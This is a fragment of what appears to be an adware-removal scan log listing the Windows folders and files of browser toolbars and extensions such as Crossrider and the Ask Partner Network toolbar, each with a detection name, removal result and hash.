<folder><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\extensionCode</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\lib</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\defaults</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\defaults\preferences</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\locale</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\locale\en-US</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></folder>
<folder><path>C:\ProgramData\APN\APN-Stub</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>fddc4d54fd8e6ec815f0a3cba959e41c</hash></folder>
<folder><path>C:\ProgramData\AskPartnerNetwork</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></folder>
<folder><path>C:\ProgramData\AskPartnerNetwork\Toolbar</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></folder>
<folder><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></folder>
<folder><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\CRX</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></folder>
<folder><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\CRX\123.24</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></folder>
<folder><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></folder>
<folder><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></folder>
<folder><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Response</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Local\AskPartnerNetwork</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>07d2fca59af1a39330d7a6c8946e4eb2</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Local\AskPartnerNetwork\Toolbar</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>07d2fca59af1a39330d7a6c8946e4eb2</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Local\AskPartnerNetwork\Toolbar\Updater</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>07d2fca59af1a39330d7a6c8946e4eb2</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Local\AskPartnerNetwork\Toolbar\Updater\IDC</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>07d2fca59af1a39330d7a6c8946e4eb2</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>delete-on-reboot</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\ChromeUtils</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>delete-on-reboot</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\CRX</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\appdata</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\appdata\Mozilla</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\appdata\Mozilla\Firefox</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\appdata\Mozilla\Firefox\Profiles</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\appdata\Mozilla\Firefox\Profiles\{DefaultProfilesFolder}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\appdata\Mozilla\Firefox\Profiles\{DefaultProfilesFolder}\extensions</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\common appdata</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\common appdata\AskPartnerNetwork</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\common appdata\AskPartnerNetwork\Toolbar</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\common appdata\AskPartnerNetwork\Toolbar\{PartnerID}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\common appdata\AskPartnerNetwork\Toolbar\{PartnerID}\CRX</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\common appdata\AskPartnerNetwork\Toolbar\{PartnerID}\CRX\{Crx_Version}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\ChromeUtils</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater\IDC</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater\{PartnerID}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\{PartnerID}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\VNT</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>delete-on-reboot</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\AVIRA-V7</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_dhdepfaagokllfmhfbcfmocaeigmoebo_0</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>c316831efc8f63d312b9bcbb39c935cb</hash></folder>
<folder><path>C:\ProgramData\IBUpdaterService</path><vendor>PUP.Optional.IBUpdater</vendor><action>success</action><hash>e1f8dac7b5d693a34c60434041c155ab</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Local\Savings Sidekick</path><vendor>PUP.Optional.SavingsSidekick</vendor><action>success</action><hash>0fca7f2268238babe4eef19d79898f71</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Local\Savings Sidekick\Chrome</path><vendor>PUP.Optional.SavingsSidekick</vendor><action>success</action><hash>0fca7f2268238babe4eef19d79898f71</hash></folder>
<folder><path>C:\Windows\Temp\APN-Stub</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></folder>
<folder><path>C:\Windows\Temp\APN-Stub\AVIRA-V7</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></folder>
<file><path>C:\Windows\System32\roboot64.exe</path><vendor>PUP.Optional.RegCleanPro</vendor><action>success</action><hash>5b7e3f62f497a5918290d2c00cf808f8</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\crossrider_statusbar.png</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\button1.png</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\button2.png</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\button3.png</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\button4.png</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\button5.png</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\icon128.png</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\icon16.png</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\icon24.png</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\icon48.png</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\panelarrow-up.png</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\popup.css</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\popup.html</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\popup_binding.xml</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\skin.css</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin\update.css</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome.manifest</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\install.rdf</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\background.html</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\browser.xul</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\crossrider.js</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\crossriderapi.js</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\CrossriderEXT.js</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\dialog.js</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\options.js</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\options.xul</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\search_dialog.xul</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\update.html</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\extensionCode\backgroundCode.js</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\extensionCode\pageCode.js</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content\lib\reports.js</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\defaults\preferences\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\locale\en-US\translations.dtd</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\searchplugins\Search_Results.xml</path><vendor>PUP.Optional.SearchResults</vendor><action>success</action><hash>eaef336eacdfe650080fb0f8d0339967</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\toolbar_AVIRA-V7@apn.ask.com.xpi</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b5249e03454687afab6fceee8d76b848</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>delete-on-reboot</action><hash>b623dac7f9921d1920c8574c14eed828</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>delete-on-reboot</action><hash>fbde6c35c5c696a078714d56cf3309f7</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\CRX\ToolbarCR.crx</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\CRX\123.24\Toolbar.crx</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.12.0.0-3.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.1.0.0-3.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.10.1.0-2.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.10.2.0-2.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.10.3.0-2.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.12.0.0-2.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.15.1.0-3.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.15.1.0-4.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.18.0.0-4.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.18.0.0-5.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.19.1.0-5.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.20.0.0-5.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.24.2.0-12.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.24.2.0-13.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.25.0.0-13.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.25.0.0-14.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.26.0.0-15.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.27.0.0-15.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.27.0.0-16.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.28.0.0-16.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.4.1.0-3.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
